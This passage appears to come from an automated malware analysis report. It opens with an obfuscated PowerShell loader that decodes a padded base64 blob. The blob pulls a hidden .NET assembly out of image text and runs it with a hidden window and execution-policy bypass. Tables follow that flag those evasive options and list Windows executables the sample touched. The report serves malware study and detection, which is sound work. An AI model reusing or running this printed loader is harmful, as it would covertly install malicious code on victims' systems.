WdGtçceGcUHOWdGtçceZQUHOWdGtçcegUHOWdGtçceDUHOWdGtçceUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceCsUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceLgBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceYgBhUHOWdGtçceHMUHOWdGtçceZQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceTUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZwB0UHOWdGtçceGgUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBzUHOWdGtçceHQUHOWdGtçceYQByUHOWdGtçceHQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBTUHOWdGtçceHUUHOWdGtçceYgBzUHOWdGtçceHQUHOWdGtçcecgBpUHOWdGtçceG4UHOWdGtçceZwUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceQwBvUHOWdGtçceG4UHOWdGtçcedgBlUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBdUHOWdGtçceDoUHOWdGtçceOgBGUHOWdGtçceHIUHOWdGtçcebwBtUHOWdGtçceEIUHOWdGtçceYQBzUHOWdGtçceGUUHOWdGtçceNgUHOWdGtçce0UHOWdGtçceFMUHOWdGtçcedUHOWdGtçceByUHOWdGtçceGkUHOWdGtçcebgBnUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZQBkUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceUgBlUHOWdGtçceGYUHOWdGtçcebUHOWdGtçceBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBpUHOWdGtçceG8UHOWdGtçcebgUHOWdGtçceuUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQBdUHOWdGtçceDoUHOWdGtçceOgBMUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceB0UHOWdGtçceHkUHOWdGtçcecUHOWdGtçceBlUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcebUHOWdGtçceBvUHOWdGtçceGEUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGQUHOWdGtçceQQBzUHOWdGtçceHMUHOWdGtçceZQBtUHOWdGtçceGIUHOWdGtçcebUHOWdGtçceB5UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceVUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCcUHOWdGtçceRgBpUHOWdGtçceGIUHOWdGtçceZQByUHOWdGtçceC4UHOWdGtçceSUHOWdGtçceBvUHOWdGtçceG0UHOWdGtçceZQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceG0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcedUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceuUHOWdGtçceEcUHOWdGtçceZQB0UHOWdGtçceE0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCgUHOWdGtçceJwBWUHOWdGtçceEEUHOWdGtçceSQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçcedgBvUHOWdGtçceGsUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcebgB1UHOWdGtçceGwUHOWdGtçcebUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceWwBvUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBbUHOWdGtçceF0UHOWdGtçceXQUHOWdGtçcegUHOWdGtçceCgUHOWdGtçceJwBkUHOWdGtçceEgUHOWdGtçceaUHOWdGtçceUHOWdGtçcewUHOWdGtçceEwUHOWdGtçcebUHOWdGtçceBKUHOWdGtçceFUUHOWdGtçceUwBDUHOWdGtçceDkUHOWdGtçceegBkUHOWdGtçceDIUHOWdGtçceOQBrUHOWdGtçceGIUHOWdGtçcebQBsUHOWdGtçceDMUHOWdGtçceTUHOWdGtçceB6UHOWdGtçceFEUHOWdGtçceMQBNUHOWdGtçceFMUHOWdGtçceNUHOWdGtçceUHOWdGtçcewUHOWdGtçceE4UHOWdGtçceaQUHOWdGtçce0UHOWdGtçceHoUHOWdGtçceTUHOWdGtçceBqUHOWdGtçceEkUHOWdGtçceNQBNUHOWdGtçceFMUHOWdGtçceOUHOWdGtçceB2UHOWdGtçceE8UHOWdGtçcebgBCUHOWdGtçceDUHOWdGtçceUHOWdGtçceZUHOWdGtçceBHUHOWdGtçceGcUHOWdGtçcePQUHOWdGtçcenUHOWdGtçceCUHOWdGtçceUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceDIUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceHIUHOWdGtçceZQBnUHOWdGtçceGEUHOWdGtçcecwBtUHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce1UHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBDUHOWdGtçceDoUHOWdGtçceXUHOWdGtçceBXUHOWdGtçceGkUHOWdGtçcebgBkUHOWdGtçceG8UHOWdGtçcedwBzUHOWdGtçceFwUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceG0UHOWdGtçcecUHOWdGtçceBcUHOWdGtçceCcUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceaUHOWdGtçceB0UHOWdGtçceG0UHOWdGtçcebUHOWdGtçceBjUHOWdGtçceCcUHOWdGtçceKQUHOWdGtçcepUHOWdGtçceUHOWdGtçce==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UHOWdGtçce','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" |
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |